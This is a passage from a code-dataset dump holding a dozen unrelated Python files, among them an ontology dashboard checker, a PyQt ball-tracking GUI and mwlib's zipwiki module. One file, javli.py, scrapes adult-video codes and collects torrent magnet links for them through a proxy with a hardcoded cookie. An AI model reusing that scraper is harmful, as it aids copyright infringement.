str(file.Filename))\n log.write(\"Allready in database %s\\n\" % str(file.Filename))\n file.WriteErrorToDB(\"Allready in database %s\" % str(file.Filename))\n\n# Define a worker function\ndef worker(file_queue):\n queue_full = True\n while queue_full:\n try:\n # Get your data off the queue, and do some work\n file = file_queue.get(False)\n processfile(file)\n file_queue.task_done()\n except queue.Empty:\n queue_full = False\n\n\n# Load up a queue with your data. 
This will handle locking\nq = queue.Queue()\nprint(\"Scanning files...\")\nfor path,dirs,files in os.walk(source):\n for filename in files:\n if filename[0] != \".\":\n FilesCount = FilesCount + 1\n file = os.path.join(path,filename)\n q.put(file)\nprint(\"Finished scanning...\")\nthread_count = 8\nfor i in range(thread_count):\n t = threading.Thread(target=worker, args = (q,))\n t.start()\nq.join()\nfinished = time.time() - begin\nprint(\"Total time : %s\" % round(finished,2))\nlog.write(\"Total time : %s\" % round(finished,2))","sub_path":"Threadtest.2.py","file_name":"Threadtest.2.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"437556980","text":"def GetAVcode():\n '''\n 从URL中获得每一页的AV code\n '''\n codelist = []\n starturl = 'http://www.javlibrary.com/cn/vl_bestrated.php'\n urls = GUrl(starturl)\n for url in urls:\n proxies = {\n 'http': '127.0.0.1:1087',\n 'https': '127.0.0.1:1087'\n }\n cookie = '__cfduid=d6584d181c0072c52af034f471e4910441513402641; timezone=-480; __utma=45030847.784005738.1513402642.1513402642.1513402642.1; __utmz=45030847.1513402642.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); sc_is_visitor_unique=rx8499656.1513402643.8C5475D9B4614FA64DC9DF6890F377AA.1.1.1.1.1.1.1.1.1; __qca=P0-1312521764-1513402642581; __utma=45030847.784005738.1513402642.1513402642.1513402642.1; __utmz=45030847.1513402642.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __atuvc=3%7C50; __atuvs=5a34e264283c7914000; over18=18'\n cookies = DealCookies(cookie)\n r = requests.get(url, proxies=proxies, cookies=cookies)\n content= r.text\n soup = BeautifulSoup(content, 'html.parser', from_encoding='utf-8')\n # 找class为id的div\n codes = soup.find_all('div', 'id')\n for code in codes:\n codelist.append(code.text)\n print('Get====='+code.text)\n return codelist\n\ndef useweb1(code):\n '''\n 使用https://idope.se/torrent-list/获取对于番号的磁力链\n :param code:\n :return:\n '''\n url_root1 = 'https://idope.se'\n search_url1 = 'https://idope.se/torrent-list/'\n headers ={'user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'}\n r1 = requests.get(search_url1+code,headers=headers)\n content1 = r1.text\n soup1 = BeautifulSoup(content1, 'html.parser')\n url_1 = soup1.find('a',href=re.compile(code))['href']\n r2 = requests.get(url_root1+url_1)\n content2 = r2.text\n soup2 = BeautifulSoup(content2, 'html.parser')\n magnet = soup2.find('div', id='deteails')\n if magnet:\n return(magnet.text)\n return ''\n \n \nif __name__ == '__main__':\n codelist = GetAVcode()\n cpus = multiprocessing.cpu_count()\n p = Pool(cpus)\n for code in codelist:\n p.apply_async(GetAVmagnet, args=(code,))\n p.close()\n p.join()\n","sub_path":"javli.py","file_name":"javli.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"394555644","text":"import requests\nimport base64\nimport os\nimport json\nimport logging\n\nimport selenium\nfrom fetch_thread import get_api, get_tweet, update_urls\nfrom screenshot_selenium import save_screenshot\n\nlogging.basicConfig(\n format='%(asctime)s %(module)s.%(funcName)s:%(levelname)s:%(message)s',\n datefmt='%m/%d/%Y %I_%M_%S %p',\n filename='log_file',\n level=logging.INFO\n)\n\ndef delete_images(photo_list):\n for photo in photo_list:\n try:\n os.remove(photo)\n except OSError:\n pass\n\ndef 
save_images(url):\n api = get_api()\n tweet = get_tweet(url)\n urls = [url]\n urls.extend(update_urls(tweet, api))\n logging.info('screenshot/save_images: URLs fetched')\n for url in urls:\n logging.info('screenshot/save_images: ' + url)\n \n count = 0\n for url in urls:\n save_image(url, \"desktop\", tweet.user.screen_name + \"_\" + str(count))\n count += 1\n base_str = os.path.join(os.getcwd(), 'images')\n return [os.path.join(base_str, tweet.user.screen_name + \"_\" + str(_count) + \".png\") for _count in range(count)]\n\ndef save_image(url, mode, name):\n save_screenshot(url, name)","sub_path":"src/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"441227160","text":"'''\r\nCreated on Mar 28, 2015\r\n\r\n@author: Brandon\r\n'''\r\nfrom django.conf.urls import patterns, url\r\nfrom member import views\r\n\r\nurlpatterns = patterns('',\r\n url(r'^$', views.memberIndex, name='memberIndex'),\r\n url(r'^(?P\\d+)/$', views.memberDetails, name='memberDetails'),\r\n url(r'^uploadFailure/$', views.uploadFailure, name='uploadFailure'),\r\n )","sub_path":"DjangoTest_1/member/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"238221850","text":"#!/usr/bin/env python3\n\nimport datetime\nimport gc\nimport json\nimport os\nimport py4j\nimport sys\nimport yaml\n\nimport dash_utils\nimport fp_001\nimport fp_002\nimport fp_003\nimport fp_004\nimport fp_005\nimport fp_006\nimport fp_007\nimport fp_008\nimport fp_009\nimport fp_011\nimport fp_012\nimport fp_016\nimport report_utils\n\nfrom argparse import ArgumentParser, FileType\nfrom io import TextIOWrapper\nfrom py4j.java_gateway import JavaGateway\n\n\ndef run():\n # ---------------------------- #\n # PREPARE INPUT\n # ---------------------------- #\n\n # parse input args\n parser = ArgumentParser(description='Create dashboard files')\n parser.add_argument('ontology', type=str, help='Input ontology file')\n parser.add_argument('registry', type=FileType('r'), help='Registry YAML file')\n parser.add_argument('license', type=FileType('r'), help='License JSON schema')\n parser.add_argument('contact', type=FileType('r'), help='Contact JSON schema')\n parser.add_argument('relations', type=FileType('r'), help='Table containing RO IRIs and labels')\n parser.add_argument('outdir', type=str, help='Output directory')\n args = parser.parse_args()\n\n owl = os.path.basename(args.ontology)\n namespace = os.path.splitext(owl)[0]\n\n ontology_file = args.ontology\n registry = args.registry\n license_schema = json.load(args.license)\n contact_schema = json.load(args.contact)\n ro_file = args.relations\n\n # Create the build directory for this ontology\n ontology_dir = args.outdir\n os.makedirs(ontology_dir, exist_ok=True)\n\n # Launch the JVM using the robot JAR\n py4j.java_gateway.launch_gateway(\n jarpath='build/robot.jar', classpath='org.obolibrary.robot.PythonOperation', die_on_exit=True, port=25333)\n\n # Activate gateway to JVM\n gateway = JavaGateway()\n robot_gateway = gateway.jvm.org.obolibrary.robot\n\n # IOHelper for working with ontologies\n io_helper = robot_gateway.IOHelper()\n\n # Handle ontology file\n big = namespace in BIG_ONTS\n if not big:\n # Load ontology as OWLOntology object\n if not ontology_file:\n ont_or_file = None\n try:\n ont_or_file = io_helper.loadOntology(ontology_file)\n 
except Exception:\n print('ERROR: Unable to load \\'{0}\\''.format(ontology_file), flush=True)\n ont_or_file = None\n # Get the Version IRI\n version_iri = dash_utils.get_version_iri(ont_or_file)\n else:\n # Just provide path to file\n ont_or_file = ontology_file\n # Get the version IRI by text parsing\n version_iri = dash_utils.get_big_version_iri(ont_or_file)\n\n # Get the registry data\n yaml_data = yaml.load(registry, Loader=yaml.SafeLoader)\n yaml_data = yaml_data['ontologies']\n data = dash_utils.get_data(namespace, yaml_data)\n\n # Map of all ontologies to their domains\n domain_map = dash_utils.get_domains(yaml_data)\n # Map of RO labels to RO IRIs\n ro_props = fp_007.get_ro_properties(ro_file)\n\n if 'is_obsolete' in data and data['is_obsolete'] == 'true':\n # do not run on obsolete ontologies\n print('{0} is obsolete and will not be checked...'.format(namespace), flush=True)\n sys.exit(0)\n\n # ---------------------------- #\n # RUN CHECKS\n # ---------------------------- #\n\n print('-----------------\\nChecking ' + namespace, flush=True)\n\n # Get the report based on if it's big or not\n report = None\n good_format = None\n if big:\n if namespace != 'gaz':\n # Report currently takes TOO LONG for GAZ\n print('Running ROBOT report on {0}...'.format(namespace), flush=True)\n report_obj = report_utils.BigReport(robot_gateway, namespace, ont_or_file)\n report = report_obj.get_report()\n good_format = report_obj.get_good_format()\n else:\n if ont_or_file:\n # Ontology is not None\n print('Running ROBOT report on {0}...'.format(namespace), flush=True)\n report = report_utils.run_report(robot_gateway, io_helper, ont_or_file)\n\n # Execute the numbered checks\n check_map = {}\n try:\n if big:\n check_map[1] = fp_001.big_is_open(ont_or_file, data, license_schema)\n else:\n check_map[1] = fp_001.is_open(ont_or_file, data, license_schema)\n except Exception as e:\n check_map[1] = 'INFO|unable to run check 1'\n print('ERROR: unable to run check 1 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[2] = fp_002.big_is_common_format(good_format)\n else:\n check_map[2] = fp_002.is_common_format(ont_or_file)\n except Exception as e:\n check_map[2] = 'INFO|unable to run check 2'\n print('ERROR: unable to run check 2 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[3] = fp_003.big_has_valid_uris(namespace, ont_or_file, ontology_dir)\n else:\n check_map[3] = fp_003.has_valid_uris(robot_gateway, namespace, ont_or_file, ontology_dir)\n except Exception as e:\n check_map[3] = 'INFO|unable to run check 3'\n print('ERROR: unable to run check 3 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[4] = fp_004.big_has_versioning(ont_or_file)\n else:\n check_map[4] = fp_004.has_versioning(ont_or_file)\n except Exception as e:\n check_map[4] = 'INFO|unable to run check 4'\n print('ERROR: unable to run check 4 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[5] = fp_005.has_scope(data, domain_map)\n except Exception as e:\n check_map[5] = 'INFO|unable to run check 5'\n print('ERROR: unable to run check 5 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[6] = fp_006.has_valid_definitions(report)\n except Exception as e:\n check_map[6] = 'INFO|unable to run check 6'\n print('ERROR: unable to run check 6 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[7] = 
fp_007.big_has_valid_relations(namespace, ont_or_file, ro_props, ontology_dir)\n else:\n check_map[7] = fp_007.has_valid_relations(namespace, ont_or_file, ro_props, ontology_dir)\n except Exception as e:\n check_map[7] = 'INFO|unable to run check 7'\n print('ERROR: unable to run check 7 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[8] = fp_008.has_documentation(data)\n except Exception as e:\n check_map[8] = 'INFO|unable to run check 8'\n print('ERROR: unable to run check 8 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[9] = fp_009.has_users(data)\n except Exception as e:\n check_map[9] = 'INFO|unable to run check 9'\n print('ERROR: unable to run check 9 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[11] = fp_011.has_contact(data, contact_schema)\n except Exception as e:\n check_map[11] = 'INFO|unable to run check 11'\n print('ERROR: unable to run check 11 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[12] = fp_012.has_valid_labels(report)\n except Exception as e:\n check_map[12] = 'INFO|unable to run check 12'\n print('ERROR: unable to run check 12 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[16] = fp_016.big_is_maintained(ont_or_file)\n else:\n check_map[16] = fp_016.is_maintained(ont_or_file)\n except Exception as e:\n check_map[16] = 'INFO|unable to run check 16'\n print('ERROR: unable to run check 16 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n # finally, add the report results to the dashboard and save the report\n try:\n check_map['report'] = report_utils.process_report(robot_gateway, report, ontology_dir)\n except Exception as e:\n check_map['report'] = 'INFO|unable to save report'\n print('ERROR: unable to save ROBOT report for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n # ---------------------------- #\n # SAVE RESULTS\n # ---------------------------- #\n\n # Parse results\n err = 0\n warn = 0\n info = 0\n all_checks = {}\n\n for check, result in check_map.items():\n if result is None or 'status' not in result:\n print('Missing result for check {0}'.format(check), flush=True)\n continue\n\n status = result['status']\n\n if status == 'ERROR':\n err += 1\n elif status == 'WARN':\n warn += 1\n elif status == 'INFO':\n info += 1\n elif status != 'PASS':\n print('Unknown status \"{0}\" for check {1}'.format(status, check), flush=True)\n continue\n\n key = check\n if check in PRINCIPLE_MAP:\n key = PRINCIPLE_MAP[check]\n elif check == 'report':\n key = 'ROBOT Report'\n\n all_checks[key] = result\n\n # Summary status\n if err > 0:\n summary = 'ERROR'\n summary_comment = '{0} errors'.format(err)\n elif warn > 0:\n summary = 'WARN'\n summary_comment = '{0} warnings'.format(warn)\n elif info > 0:\n summary = 'INFO'\n summary_comment = '{0} info messages'.format(info)\n else:\n summary = 'PASS'\n summary_comment = ''\n\n date = datetime.datetime.today()\n save_data = {'namespace': namespace, 'version': version_iri, 'date': date.strftime('%Y-%m-%d'),\n 'summary': {'status': summary, 'comment': summary_comment}, 'results': all_checks}\n\n # Save to YAML file\n outfile = os.path.join(ontology_dir, 'dashboard.yml')\n print('Saving results to {0}'.format(outfile))\n with open(outfile, 'w+') as f:\n yaml.dump(save_data, f)\n\n sys.exit(0)\n\n\nBIG_ONTS = ['bto', 'chebi', 'dron', 'gaz', 'ncbitaxon', 'ncit', 'pr', 'uberon']\nOBO = 
'http://purl.obolibrary.org/obo'\n\nPRINCIPLE_MAP = {\n 1: 'FP1 Open',\n 2: 'FP2 Common Format',\n 3: 'FP3 URIs',\n 4: 'FP4 Versioning',\n 5: 'FP5 Scope',\n 6: 'FP6 Textual Definitions',\n 7: 'FP7 Relations',\n 8: 'FP8 Documented',\n 9: 'FP9 Plurality of Users',\n 11: 'FP11 Locus of Authority',\n 12: 'FP12 Naming Conventions',\n 16: 'FP16 Maintenance'\n}\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"util/dashboard/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":10530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"365393626","text":"import math\n\ndef pascals_triangle(size):\n triangle = []\n i = 0\n while i <= size:\n line = []\n k = 0\n while k <= i:\n line.append(math.factorial(i) / (math.factorial(k) * math.factorial(i-k)))\n k += 1\n triangle.append(line)\n i += 1\n return triangle\n\ndef get_triangle(size):\n triangle = pascals_triangle(size)\n for i in triangle:\n print(i, \" \")\n return\n\ndef main():\n for i in range(15):\n get_triangle(i)\nmain()\n","sub_path":"pascals_triangle.py","file_name":"pascals_triangle.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"120787367","text":"import sys\nimport time\n\nfrom PyQt5 import QtWidgets, QtGui, QtCore\n\nfrom green_ball_tracker import General_control,Region_number\nball_number = 0\ncoordinates = \"\"\ncentroid_text = \"\"\nball_list = \"\"\nt = General_control()\ndef Window():\n global ball_number\n global coordinates\n global centroid_text\n global ball_list\n global t\n\n app = QtWidgets.QApplication(sys.argv)\n v_box = QtWidgets.QVBoxLayout()\n label1 = QtWidgets.QLabel(\"Python green ball tracking app with opencv\")\n v_box.addWidget(label1,alignment=QtCore.Qt.AlignCenter)\n label2 = QtWidgets.QLabel()\n pixmap = QtGui.QPixmap(\"balls.jpeg\")\n pixmap_resized = pixmap.scaled(480, 360, QtCore.Qt.KeepAspectRatio)\n label2.setPixmap(pixmap_resized)\n v_box.addWidget(label2,alignment=QtCore.Qt.AlignCenter)\n\n # Select Class\n label0 = QtWidgets.QLabel(\"Select Class\")\n Region_button = QtWidgets.QRadioButton(\"Regionn Number\")\n General_button = QtWidgets.QRadioButton(\"General Control\")\n radio_button = QtWidgets.QPushButton(\"Select\")\n def click0():\n global t\n if(Region_button.isChecked()):\n t = Region_number()\n if(General_button.isChecked()):\n t = General_control()\n t.close()\n\n radio_button.clicked.connect(click0)\n\n v_box0 = QtWidgets.QVBoxLayout()\n v_box0.addWidget(label0)\n v_box0.addWidget(Region_button)\n v_box0.addWidget(General_button)\n v_box0.addWidget(radio_button)\n v_box.addLayout(v_box0)\n\n\n\n # Webcam start\n button1 = QtWidgets.QPushButton(\"Start green ball tracking (press q for stop) \")\n def click1():\n global t\n t.track_balls()\n button1.clicked.connect(click1)\n v_box.addWidget(button1)\n\n\n # Find total green ball numbers\n\n button2 = QtWidgets.QPushButton(\"Get number of all balls\")\n label3 = QtWidgets.QLabel(\"Total green ball number is:\" + str(ball_number))\n def click2():\n global t\n global ball_number\n ball_number = t.get_balls_number()\n label3.setText(\"Total green ball number is:\" + str(ball_number))\n\n button2.clicked.connect(click2)\n\n h_box = QtWidgets.QHBoxLayout()\n h_box.addWidget(button2)\n h_box.addWidget(label3)\n v_box.addLayout(h_box)\n\n # Ball coordinates\n\n label4 = QtWidgets.QLabel(str(coordinates))\n def click3():\n global t\n global coordinates\n coordinates = 
t.get_ball_coordinates()\n label4.setText(str(coordinates))\n\n button3 = QtWidgets.QPushButton(\"Find all coordinates\")\n\n button3.clicked.connect(click3)\n h_box2 = QtWidgets.QHBoxLayout()\n h_box2.addWidget(button3)\n h_box2.addWidget(label4)\n v_box.addLayout(h_box2)\n # centroid\n label5 = QtWidgets.QLabel(str(centroid_text))\n def click4():\n global t\n global centroid_text\n centroid_text = t.centroid()\n label5.setText(str(centroid_text))\n button4 = QtWidgets.QPushButton(\"Centroid\")\n button4.clicked.connect(click4)\n h_box3 = QtWidgets.QHBoxLayout()\n h_box3.addWidget(button4)\n h_box3.addWidget(label5)\n v_box.addLayout(h_box3)\n\n # ball list\n\n label6 = QtWidgets.QLabel(str(ball_list))\n\n def click5():\n global t\n global ball_list\n ball_list = \"\"\n\n for i in t.get_ball_list():\n ball_list +=str(i)\n label6.setText(str(ball_list))\n\n button5 = QtWidgets.QPushButton(\"Ball List\")\n button5.clicked.connect(click5)\n h_box4 = QtWidgets.QHBoxLayout()\n h_box4.addWidget(button5)\n h_box4.addWidget(label6)\n v_box.addLayout(h_box4)\n\n v_box.addStretch()\n window = QtWidgets.QWidget()\n window.setWindowTitle(\"Green Ball Tracking\")\n window.setLayout(v_box)\n\n window.setGeometry(100,100,640,480)\n window.show()\n time.sleep(1)\n sys.exit(app.exec())\n\n\n\n\ndef main():\n Window()\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"574024923","text":"#! /usr/bin/python3.7\nwhile True:\n\tdef DSTFC():\n\t\tkeywordsDist = ['d', 'dis', 'dist', 'distance']\n\t\tkeywordsTime = ['t', 'tim', 'time', 'ti']\n\t\tkeywordsSpeed = ['s', 'sp', 'spe', 'spee', 'speed']\n\t\tprint(\"Welcome to the distance speed time calculator\")\n\t\tsolveFor = input(\"What are we solvig for? 
(distance(d), speed(s) or time(t): \").lower()\n\t\tif solveFor in keywordsDist:\n\t\t\ts = float(input(\"What is speed in meters/seconds?: \"))\n\t\t\tt = float(input(\"What is the amount of time in seconds?: \"))\n\t\t\tdist = s * t\n\t\t\tprint(\"{} meters\".format(dist))\n\t\telif solveFor in keywordsTime:\n\t\t\td = float(input(\"What is the distance in meters?: \"))\n\t\t\ts = float(input(\"What is the speed in meters/seconds\"))\n\t\t\ttime = d / s\n\t\t\tprint(\"{} seconds\".format(time))\n\t\telif solveFor in keywordsSpeed:\n\t\t\td = float(input(\"What is the distance in meters?: \"))\n\t\t\tt = float(input(\"What is the time in seconds\"))\n\t\t\tspeed = d / t\n\t\t\tprint(\"{} m/s\".format(speed))\n\tDSTFC()\nDSTFC()","sub_path":"phys/distspeed.py","file_name":"distspeed.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"509826456","text":"\"\"\"\nThe field module provides information about the field\nin BundleType.\n\nFields are allowed to be flipped, indicating that it's\nopposite direction to the BundleType.\n\nEach field includes\n name: individual name of the field;\n type: defined type;\n orientation: flipped or not.\n\"\"\"\nfrom .utils import serialize_str\n\n\nclass Field(object):\n def __init__(self, name, tpe, is_flipped=False):\n self.name = name\n self.tpe = tpe\n self.is_flipped = is_flipped\n\n def serialize(self, output):\n if self.is_flipped:\n output.write(b\"flip \")\n output.write(serialize_str(self.name))\n output.write(b\" : \")\n self.tpe.serialize(output)\n\n def field_eq(self, other):\n if type(other) != type(self):\n return False\n if self.name != other.name:\n return False\n if self.is_flipped != other.is_flipped:\n return False\n return self.tpe.type_eq(other.tpe)\n","sub_path":"py_hcl/firrtl_ir/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"454401509","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python3\nimport csv\n\nclass Ontology(object):\n \"\"\"docstring for Ontology.\"\"\"\n def __init__(self):\n super(Ontology, self).__init__()\n #self.arg = arg\n\n def write_owl(self):\n self.write_city_data()\n #self.write_poi_data()\n\n def write_city_data(self):\n rows = []\n with open('city_data.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for r in reader:\n rows.append(r)\n\n with open('smart_city_ontology.owl','r', newline='') as original_file:\n with open('smart_city.owl','w') as file:\n for line in original_file:\n if 'Declaration(ObjectProperty(' in line:\n file.write('writing object property declaration\\n')\n file.write(line)\n else:\n file.write(line)\n\n\n def write_poi_data(self):\n with open('foursquare_data.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in reader:\n print(row)\n","sub_path":"ontology.py","file_name":"ontology.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"401552980","text":"#! 
/usr/bin/env python\n\n# Copyright (c) 2008, PediaPress GmbH\n# See README.txt for additional licensing information.\n\nimport os\nimport shutil\nimport tempfile\nfrom zipfile import ZipFile\nimport urlparse\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nfrom mwlib import wikidbbase, namespace\n\nclass Wiki(wikidbbase.WikiDBBase):\n def __init__(self, zipfile):\n \"\"\"\n @type zipfile: basestring or ZipFile\n \"\"\"\n \n if isinstance(zipfile, ZipFile):\n self.zf = zipfile\n else:\n self.zf = ZipFile(zipfile)\n self.metabook = json.loads(self.zf.read(\"metabook.json\"))\n content = json.loads(self.zf.read('content.json'))\n self.articles = content.get('articles', {})\n self.templates = content.get('templates', {})\n self.sources = content.get('sources', {})\n \n def _getArticle(self, title, revision=None):\n try:\n article = self.articles[title]\n if revision is None or article['revision'] == revision:\n return article\n except KeyError:\n pass\n return None\n \n def getSource(self, title, revision=None):\n \"\"\"Return source for article with given title and revision\n \n @param title: article title\n @type title: unicode\n \n @param revision: article revision (optional)\n @type revision: unicode\n \"\"\"\n \n article = self._getArticle(title, revision=revision)\n if article is None:\n return None\n try:\n return self.sources[article['source-url']]\n except KeyError:\n return None\n \n def getInterwikiMap(self, title, revision=None):\n \"\"\"Return interwikimap for given article and revision\n \n @returns: interwikimap, i.e. dict mapping prefixes to interwiki data\n @rtype: dict\n \"\"\"\n \n source = self.getSource(title, revision=revision)\n if source is None:\n return None\n return source.get('interwikimap', None)\n \n def getRawArticle(self, title, revision=None):\n ns, partial, full = namespace.splitname(title)\n if ns==namespace.NS_TEMPLATE:\n return self.getTemplate(partial)\n article = self._getArticle(title, revision=revision)\n if article:\n result = article['content']\n if isinstance(result, str): # fix bug in some simplejson version w/ Python 2.4\n return unicode(result, 'utf-8')\n return result\n return None\n \n def getURL(self, title, revision=None):\n article = self._getArticle(title, revision=revision)\n if article:\n return article['url']\n return None\n \n def getAuthors(self, title, revision=None):\n article = self._getArticle(title, revision=revision)\n if article:\n return article.get('authors', [])\n return None\n \n def getTemplate(self, name, followRedirects=True):\n ns, name, full = namespace.splitname(name, namespace.NS_TEMPLATE)\n if ns!=namespace.NS_TEMPLATE:\n return self.getRawArticle(full)\n \n \n try:\n result = self.templates[name]['content']\n if isinstance(result, str): # fix bug in some simplejson version w/ Python 2.4\n return unicode(result, 'utf-8')\n return result\n except KeyError:\n pass\n return None\n \n\nclass ImageDB(object):\n def __init__(self, zipfile, tmpdir=None):\n \"\"\"\n @type zipfile: basestring or ZipFile\n \"\"\"\n \n if isinstance(zipfile, ZipFile):\n self.zf = zipfile\n else:\n self.zf = ZipFile(zipfile)\n content = json.loads(self.zf.read('content.json'))\n self.images = content['images']\n self._tmpdir = tmpdir\n self.diskpaths = {}\n \n def clear(self):\n if self._tmpdir is not None:\n shutil.rmtree(self._tmpdir)\n \n @property\n def tmpdir(self):\n if self._tmpdir is None:\n self._tmpdir = unicode(tempfile.mkdtemp())\n return self._tmpdir\n\n def getPath(self, name, size=None):\n url = 
self.getURL(name, size=size)\n        if url is None:\n            return\n        path = urlparse.urlparse(url)[2]\n        pos = path.find('/thumb/')\n        if pos >= 0:\n            return path[pos + 1:]\n        if path.count('/') >= 4:\n            prefix, repo, hash1, hash2, name = url.rsplit('/', 4)\n            return '%s/%s/%s/%s' % (repo, hash1, hash2, name)\n        return path\n    \n    def getDiskPath(self, name, size=None):\n        try:\n            return self.diskpaths[name]\n        except KeyError:\n            pass\n        try:\n            data = self.zf.read('images/%s' % name.replace(\"'\", '-').encode('utf-8'))\n        except KeyError: # no such file\n            return None\n        \n        try:\n            ext = '.' + name.rsplit('.', 1)[1]\n        except IndexError:\n            ext = ''\n        if ext.lower() == '.svg':\n            ext = '.svg.png'\n        elif ext.lower() == '.gif':\n            ext = '.gif.png'\n        res = os.path.join(self.tmpdir, 'image%04d%s' % (len(self.diskpaths), ext))\n        self.diskpaths[name] = res\n        f = open(res, \"wb\")\n        f.write(data)\n        f.close()\n        return res\n    \n    def getImageTemplates(self, name, wikidb=None):\n        try:\n            return self.images[name]['templates']\n        except KeyError:\n            return []\n    \n    def getContributors(self, name, wikidb=None):\n        try:\n            return self.images[name]['contributors']\n        except KeyError:\n            return []\n    \n    def getURL(self, name, size=None):\n        try:\n            return self.images[name]['url']\n        except KeyError:\n            return None\n    \n    def getDescriptionURL(self, name):\n        try:\n            return self.images[name]['descriptionurl']\n        except KeyError:\n            return None\n    \n    def clean(self):\n        if self._tmpdir:\n            shutil.rmtree(self._tmpdir, ignore_errors=True)\n    \n\n\n\nclass FakeImageDB(ImageDB):\n\n    imagedata = '\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x03 \\x00\\x00\\x01\\xe0\\x01\\x03\\x00\\x00\\x00g\\xc9\\x9b\\xb6\\x00\\x00\\x00\\x01sRGB\\x00\\xae\\xce\\x1c\\xe9\\x00\\x00\\x00\\x06PLTE\\xff\\xff\\xff\\x00\\x00\\x00U\\xc2\\xd3~\\x00\\x00\\x00\\tpHYs\\x00\\x00\\x0b\\x13\\x00\\x00\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00EIDATx\\xda\\xed\\xc1\\x01\\x01\\x00\\x00\\x00\\x82 \\xff\\xafnH@\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00/\\x06\\xbd`\\x00\\x01`<5\\x84\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n\n    def __init__(self, tmpdir=None):\n        \"\"\"\n        @type zipfile: basestring or ZipFile\n        \"\"\"\n        self._tmpdir = tmpdir\n    \n    def getDiskPath(self, name, size=None):\n        res = os.path.join(self.tmpdir, 'blank.png')\n        if not os.path.exists(res):\n            # write in binary mode: imagedata is raw PNG bytes\n            open(res, \"wb\").write(self.imagedata)\n        return res\n    \n    def getPath(self):\n        raise NotImplementedError('getPath() does not work with zipwiki.FakeImageDB!')\n    \n    def getURL(self, name):\n        raise NotImplementedError('getURL() does not work with zipwiki.FakeImageDB!')\n    \n    def getDescriptionURL(self, name):\n        raise NotImplementedError('getDescriptionURL() does not work with zipwiki.FakeImageDB!')\n    \n    def getImageTemplates(self, name, wikidb=None):\n        raise NotImplementedError('getImageTemplates() does not work with zipwiki.FakeImageDB!')\n    \n\n\n","sub_path":"utils/mwlib/zipwiki.py","file_name":"zipwiki.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"635329056","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport logging\nfrom os import getcwd, environ, path as ospath\nfrom sys import argv\nfrom sys import exit as sys_exit\nfrom sys import path as jppath\n\n# 
